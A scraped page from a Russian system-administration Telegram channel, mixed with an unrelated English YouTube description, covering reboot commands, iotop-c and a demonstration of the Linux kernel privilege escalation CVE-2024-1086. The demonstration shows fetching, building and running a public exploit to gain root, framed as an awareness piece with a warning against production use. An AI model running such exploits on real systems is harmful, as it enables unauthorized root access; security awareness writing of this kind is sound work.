ServerAdmin.ru
Авторская информация о системном администрировании. Информация о рекламе: @srv_admin_reklama_bot Автор: @zeroxzed Второй канал: @srv_admin_live Сайт: serveradmin.ru
إظهار المزيد- المشتركون
- التغطية البريدية
- ER - نسبة المشاركة
جاري تحميل البيانات...
جاري تحميل البيانات...
shutdown -r
и reboot
. Сейчас всё это не имеет значения, так как реально всем управляет systemd. А если посмотреть на shutdown
и reboot
, то окажется, что это символьные ссылки на systemctl.
# whereis reboot
reboot: /usr/sbin/reboot
# ls -la /usr/sbin/reboot
/usr/sbin/reboot -> /bin/systemctl
# whereis shutdown
shutdown: /usr/sbin/shutdown
# ls -la /usr/sbin/shutdown
/usr/sbin/shutdown -> /bin/systemctl
То есть не важно, как вы перезагрузите сервер. Всё равно команда будет отправлена в systemd. В некоторых инструкциях и статьях вижу, что сервер перезагружают так:
# systemctl reboot
Набирать systemctl не обязательно. Обычный reboot выполнит ту же самую команду.
Возникает вопрос, а как systemctl понимает, какую команду надо выполнить? Символьные ссылки одинаковы в обоих случаях и ведут просто в /bin/systemctl
. С помощью механизма запуска программ execve можно узнать имя исполняемой команды. Примерно так:
$ bash -c 'echo $0'
bash
$0
покажет имя запущенной команды. В systemctl стоит проверка вызванной команды, поэтому она определяет, что реально вы запустили - reboot
или shutdown
. Вообще, в systemctl столько всего наворочено. Перезагрузить компьютер так же можно следующими командами:
# systemctl start reboot.target
# systemctl start ctrl-alt-del.target
Эти команды делают то же самое, что и reboot. По крайней мере на первый взгляд. Остаётся только гадать, зачем там всё это. Ну либо где-то в манах или исходниках читать.
Дам ещё небольшую подсказку в рамках этой темы. И shutdown, и reboot, и systemctl в итоге обращаются к бинарнику на диске. Если у вас какие-то проблемы с диском и не удаётся прочитать этот бинарник, то перезагрузка не состоится. Всё будет продолжать висеть. Если запущена консоль, то можно через неё сразу передать команду на перезагрузку напрямую ядру
# echo b > /proc/sysrq-trigger
Сервер тут же перезагрузится, как будто у него физически нажали reset.
#linux# apt search iotop
iotop/stable 0.6-42-ga14256a-0.1+b2 amd64
simple top-like I/O monitor
iotop-c/stable,now 1.23-1+deb12u1 amd64 [installed]
simple top-like I/O monitor (implemented in C)
А в Fedora iotop полностью заменили на iotop-c, с сохранением старого названия.
Так что если захотите воспользоваться iotop, чтобы отследить дисковую активность отдельных процессов, то ставьте на всякий случай сразу iotop-c. Программа простая и удобная. Запустили, отсортировали по нужному столбцу (стрелками влево или вправо) и смотрим активность. Обычно в первую очередь запись интересует.
Напомню, что у меня есть небольшая заметка про комплексный анализ дисковой активности в Linux с помощью различных консольных утилит.
#perfomanceWhen you are new to a group, sometimes it's hard to fit in. New-to-Linux users often find that it is hard for them to fit in with longtime Linux users. So here are some tips on how you can start acting like a longtime Linux user...so you can fit in. MUSIC : ► Adrift by ELPHNT (from YouTube Audio Library) IMAGES: ►
https://en.wikipedia.org/wiki/Linux_user_group#/media/File:Installfest.jpg- Linux User Group Wikipedia ►
https://conf.archlinux.org/- Picture from Arch Conf WANT TO SUPPORT THE CHANNEL? 💰 Patreon:
https://www.patreon.com/distrotube💳 Paypal:
https://www.youtube.com/redirect?event=channel_banner&redir_token=QUFFLUhqazNocEhiaGFBT1l1MnRHbnlIcHFKbXJWVnpQd3xBQ3Jtc0tsLVZJc19YeFlwZ2JqbXVOa3g0Skw4TVhTV2otNm1tM3A1bUNnamh3S2V6OGQtLTBnSjBxYTlvUXMxeEVIS3o4US10NENHMUQ3STk2a01FOFBhUnZjZFctMEhFUTg1TVctQmFfVUdxZXJ4TDl0azlYNA&q=https%3A%2F%2Fwww.paypal.com%2Fcgi-bin%2Fwebscr%3Fcmd%3D_donations%26business%3Dderek%2540distrotube%252ecom%26lc%3DUS%26item_name%3DDistroTube%26no_note%3D0%26currency_code%3DUSD%26bn%3DPP%252dDonationsBF%253abtn_donateCC_LG%252egif%253aNonHostedGuest🛍️ Amazon:
https://amzn.to/2RotFFi👕 Teespring:
https://teespring.com/stores/distrotubeDONATE CRYPTO: 💰 Bitcoin: 1Mp6ebz5bNcjNFW7XWHVht36SkiLoxPKoX 🐶 Dogecoin: D5fpRD1JRoBFPDXSBocRTp8W9uKzfwLFAu 📕 LBC: bMfA2c3zmcLxPCpyPcrykLvMhZ7A5mQuhJ DT ON THE WEB: 🕸️ Website: http://distrotube.com/ 📁 GitLab:
https://gitlab.com/dwt1🗨️ Mastodon:
https://fosstodon.org/@distrotube👫 Reddit:
https://www.reddit.com/r/DistroTube/📽️ LBRY/Odysee:
https://odysee.com/@DistroTube:2FREE AND OPEN SOURCE SOFTWARE THAT I USE: 🌐 Brave Browser -
https://brave.com/dis872📽️ Open Broadcaster Software:
https://obsproject.com/🎬 Kdenlive:
https://kdenlive.org🎨 GIMP:
https://www.gimp.org/💻 VirtualBox:
https://www.virtualbox.org/🗒️ Doom Emacs:
https://github.com/hlissner/doom-emacsYour support is very much appreciated. Thanks, guys!
# uname -a
Linux ubuntu22-vm 6.2.0-1014-azure #14~22.04.1-Ubuntu SMP Wed Sep 13 16:15:26 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
Ядро уязвимо. Клонируем репозиторий и собираем бинарник:
# git clone https://github.com/Notselwyn/CVE-2024-1086
# cd CVE-2024-1086
# make
Для успешной сборки нужны некоторые пакеты:
# apt install make gcc musl-tools
Если по какой-то причине не получится собрать, можете взять готовый бинарник:
# wget https://github.com/Notselwyn/CVE-2024-1086/releases/download/v1.0.0/exploit
# chmod +x exploit
Запускаем эксплойт:
# ./exploit
Проверяем своего пользователя:
# id
uid=0(root) gid=0(root) groups=0(root)
Система при работе эксплоита может зависнуть, так что срабатывает через раз. В репозитории несколько обращений по этой теме. Тем не менее, с большой долей вероятности эксплоит срабатывает. Я проверял несколько раз.
И таких уязвимостей в ядре находят немало. Иногда смотрю какие-то разборы взломов. Там взломщики тем или иным образом попадают в систему, чаще всего через веб приложения или сайты. Смотрят версию ядра, проверяют уязвимости и готовые эксплоиты по публичным базам данных. Если под ядро есть эксплоит, то практически без проблем получают полные права.
❗️На всякий случай предупрежу, а то мало ли. Не проверяйте этот эксплойт на рабочих системах. Я чисто для демонстрации работы уязвимостей в ядре всё это показал, потому что подобное и раньше видел. Это типовая история. Проверять свои системы так не надо.
#securityПодробное описание процесса обновления Zabbix Server с версии 6 до актуальной 7 на примере реального сервера.